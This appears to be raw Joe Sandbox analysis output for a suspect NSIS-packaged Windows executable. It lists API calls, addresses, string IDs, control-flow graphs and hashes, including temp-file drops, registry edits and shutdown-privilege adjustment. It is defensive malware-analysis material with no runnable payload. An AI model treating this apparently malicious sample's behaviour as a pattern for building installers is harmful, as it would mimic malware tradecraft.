4359 401a30 4360 402da6 17 API calls 4359->4360 4361 401a39 ExpandEnvironmentStringsW 4360->4361 4362 401a4d 4361->4362 4364 401a60 4361->4364 4363 401a52 lstrcmpW 4362->4363 4362->4364 4363->4364 4370 4023b2 4371 4023ba 4370->4371 4373 4023c0 4370->4373 4372 402da6 17 API calls 4371->4372 4372->4373 4374 402da6 17 API calls 4373->4374 4375 4023ce 4373->4375 4374->4375 4376 4023dc 4375->4376 4377 402da6 17 API calls 4375->4377 4378 402da6 17 API calls 4376->4378 4377->4376 4379 4023e5 WritePrivateProfileStringW 4378->4379 4380 402434 4381 402467 4380->4381 4382 40243c 4380->4382 4383 402da6 17 API calls 4381->4383 4384 402de6 17 API calls 4382->4384 4385 40246e 4383->4385 4386 402443 4384->4386 4391 402e64 4385->4391 4388 402da6 17 API calls 4386->4388 4390 40247b 
4386->4390 4389 402454 RegDeleteValueW RegCloseKey 4388->4389 4389->4390 4392 402e71 4391->4392 4393 402e78 4391->4393 4392->4390 4393->4392 4395 402ea9 4393->4395 4396 4063aa RegOpenKeyExW 4395->4396 4397 402ed7 4396->4397 4398 402ee7 RegEnumValueW 4397->4398 4405 402f0a 4397->4405 4406 402f81 4397->4406 4399 402f71 RegCloseKey 4398->4399 4398->4405 4399->4406 4400 402f46 RegEnumKeyW 4401 402f4f RegCloseKey 4400->4401 4400->4405 4402 40690a 5 API calls 4401->4402 4404 402f5f 4402->4404 4403 402ea9 6 API calls 4403->4405 4404->4406 4407 402f63 RegDeleteKeyW 4404->4407 4405->4399 4405->4400 4405->4401 4405->4403 4406->4392 4407->4406 4408 401735 4409 402da6 17 API calls 4408->4409 4410 40173c SearchPathW 4409->4410 4411 401757 4410->4411 4412 401d38 4413 402d84 17 API calls 4412->4413 4414 401d3f 4413->4414 4415 402d84 17 API calls 4414->4415 4416 401d4b GetDlgItem 4415->4416 4417 402638 4416->4417 4418 4014b8 4419 4014be 4418->4419 4420 401389 2 API calls 4419->4420 4421 4014c6 4420->4421 4422 40263e 4423 402652 4422->4423 4424 40266d 4422->4424 4425 402d84 17 API calls 4423->4425 4426 402672 4424->4426 4427 40269d 4424->4427 4434 402659 4425->4434 4428 402da6 17 API calls 4426->4428 4429 402da6 17 API calls 4427->4429 4431 402679 4428->4431 4430 4026a4 lstrlenW 4429->4430 4430->4434 4439 40655f WideCharToMultiByte 4431->4439 4433 40268d lstrlenA 4433->4434 4435 4026d1 4434->4435 4436 4026e7 4434->4436 4438 40610e 5 API calls 4434->4438 4435->4436 4437 4060df WriteFile 4435->4437 4437->4436 4438->4435 4439->4433

Control-flow Graph (legend: Executed / Not Executed)
APIs
• SetErrorMode.KERNELBASE(00008001), ref: 00403550
• GetVersionExW.KERNEL32(?), ref: 00403579
• GetVersionExW.KERNEL32(0000011C), ref: 00403590
• lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403627
• #17.COMCTL32(00000007,00000009,0000000B), ref: 00403663
• OleInitialize.OLE32(00000000), ref: 0040366A
• SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403688
• GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 0040369D
• CharNextW.USER32(00000000,"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe" ,00000020,"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe" ,00000000), ref: 004036D6
• GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 00403809
• GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040381A
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403826
• GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040383A
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403842
• SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403853
• SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040385B
• DeleteFileW.KERNELBASE(1033), ref: 0040386F
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403956
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403965
  • Part of subcall function 00405AEB: CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
• lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403970
• lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Program Files (x86)\E6l40hhe,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe" ,00000000,?), ref: 0040397C
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040399C
• DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,?), ref: 004039FB
• CopyFileW.KERNEL32(00443800,0042AA28,00000001), ref: 00403A0E
• CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403A3B
• ExitProcess.KERNEL32(?), ref: 00403A59
• OleUninitialize.OLE32(?), ref: 00403A5E
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403A78
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A8C
                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA7
                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AC6
                                                                                                                                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AEB
                                                                                                                                                                                                                                • ExitProcess.KERNEL32 ref: 00403B0C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                                                                                                                                                                                                • String ID: "C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe" $.tmp$1033$C:\Program Files (x86)\E6l40hhe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                                • API String ID: 2292928366-4092604979
                                                                                                                                                                                                                                • Opcode ID: 6c3bd8c22d6e18a8b5ab610896a1dc0f2008672ff6007d1aefcbe699feda6b26
                                                                                                                                                                                                                                • Instruction ID: 4d4dc0a58e4858e72561def8a0259f0227da8af974c10a5ea2b310ef4b80d7a5
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c3bd8c22d6e18a8b5ab610896a1dc0f2008672ff6007d1aefcbe699feda6b26
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66E10670A00214AADB10AFB59D45BAF3AB8EF4470AF14847FF545B22D1DB7C8A41CB6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,\*.*), ref: 00405CBA
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,76F73420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                                                                                                                                                                                                                                • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00405DA2
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$\*.*
                                                                                                                                                                                                                                • API String ID: 2035342205-3920725043
                                                                                                                                                                                                                                • Opcode ID: d4824498ca5d4646401654330336f54dc3516ea2401a274e156101c2699109e4
                                                                                                                                                                                                                                • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4824498ca5d4646401654330336f54dc3516ea2401a274e156101c2699109e4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FindFirstFileW.KERNELBASE(76F73420,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76F73420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76F73420,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 0040688A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                                                                • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405788
                                                                                                                                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 0040578F
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405817
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                                                                                                                                                                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004058B3
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 004058D7
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                                                                                                                                                                                                • ShowWindow.USER32(00000008), ref: 00405926
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 0040596B
                                                                                                                                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040597F
                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 0040599F
                                                                                                                                                                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                                                                                                                                                                                                • OpenClipboard.USER32(00000000), ref: 00405A00
                                                                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00405A06
                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405A1C
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405A5B
                                                                                                                                                                                                                                • CloseClipboard.USER32 ref: 00405A61
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619630576.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619758241.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619809829.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619856789.000000000040D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619909846.000000000040F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4619966470.0000000000416000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620066117.000000000042F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620120982.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620183842.0000000000440000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620251241.000000000044D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                • Associated: 00000022.00000002.4620767472.0000000000493000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                                • String ID: {
                                                                                                                                                                                                                                • API String ID: 4154960007-366298937
                                                                                                                                                                                                                                • Opcode ID: cf68a949d625f316b0d3f906fa947f90e03d995c98a419fd8c5235590907ee73
                                                                                                                                                                                                                                • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf68a949d625f316b0d3f906fa947f90e03d995c98a419fd8c5235590907ee73
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403FD6
                                                                                                                                                                                                                                • ShowWindow.USER32(?), ref: 00403FF6
                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404008
                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00404021
                                                                                                                                                                                                                                • DestroyWindow.USER32 ref: 00404035
                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040404E
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,?), ref: 0040406D
                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00404081
                                                                                                                                                                                                                                • IsWindowEnabled.USER32(00000000), ref: 00404088
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000001), ref: 00404133
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000002), ref: 0040413D
                                                                                                                                                                                                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00404157
                                                                                                                                                                                                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041A8
                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000003), ref: 0040424E
                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,?), ref: 0040426F
                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404281
                                                                                                                                                                                                                                • EnableWindow.USER32(?,?), ref: 0040429C
                                                                                                                                                                                                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042B2
                                                                                                                                                                                                                                • EnableMenuItem.USER32(00000000), ref: 004042B9
                                                                                                                                                                                                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004042D1
                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004042E4
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042D268,?,0042D268,00000000), ref: 0040430E
                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,0042D268), ref: 00404322
                                                                                                                                                                                                                                • ShowWindow.USER32(?,0000000A), ref: 00404456
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 121052019-0
                                                                                                                                                                                                                                • Opcode ID: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                                                                                • Instruction ID: 19e8ffe36521fda3862950d2389d84f1ef0c133ac5ff71005f69e3a94542e2f3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 655396db076bddd1a804ad939a9de1a35d1e50ec2b89a3d41d0d0026322ce3ca
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DDC1A1B1A00704ABDB206F61EE49E2B3A68FB84746F15053EF741B61F1CB799841DB2D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

Control-flow Graph (function at 00403BEC; nodes marked Executed / Not Executed; graph data not reproduced)
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                                                                                  • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                                                                                • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,76F73420), ref: 00403CED
                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,00000000,?), ref: 00403D0B
                                                                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D54
                                                                                                                                                                                                                                  • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                                                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403D91
                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DA9
                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DDE
                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433EA0), ref: 00403E40
                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,00433EA0), ref: 00403E4D
                                                                                                                                                                                                                                • RegisterClassW.USER32(00433EA0), ref: 00403E56
                                                                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00403F9A,00000000), ref: 00403E75
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Stuffiness7.dat$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                                • API String ID: 1975747703-2823021303
                                                                                                                                                                                                                                • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                                                                                • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

Control-flow Graph (function at 0040307D; nodes marked Executed / Not Executed; graph data not reproduced)
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                                                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                                                                                • String ID: C:\Program Files (x86)\E6l40hhe$C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                                                                                                                                                                • API String ID: 2803837635-179649033
                                                                                                                                                                                                                                • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                                                                                                                                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 504 40559f-4055b4 505 4055ba-4055cb 504->505 506 40566b-40566f 504->506 507 4055d6-4055e2 lstrlenW 505->507 508 4055cd-4055d1 call 40657a 505->508 510 4055e4-4055f4 lstrlenW 507->510 511 4055ff-405603 507->511 508->507 510->506 512 4055f6-4055fa lstrcatW 510->512 513 405612-405616 511->513 514 405605-40560c SetWindowTextW 511->514 512->511 515 405618-40565a SendMessageW * 3 513->515 516 40565c-40565e 513->516 514->513 515->516 516->506 517 405660-405663 516->517 517->506
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0042C248,00000000,?,76F723A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
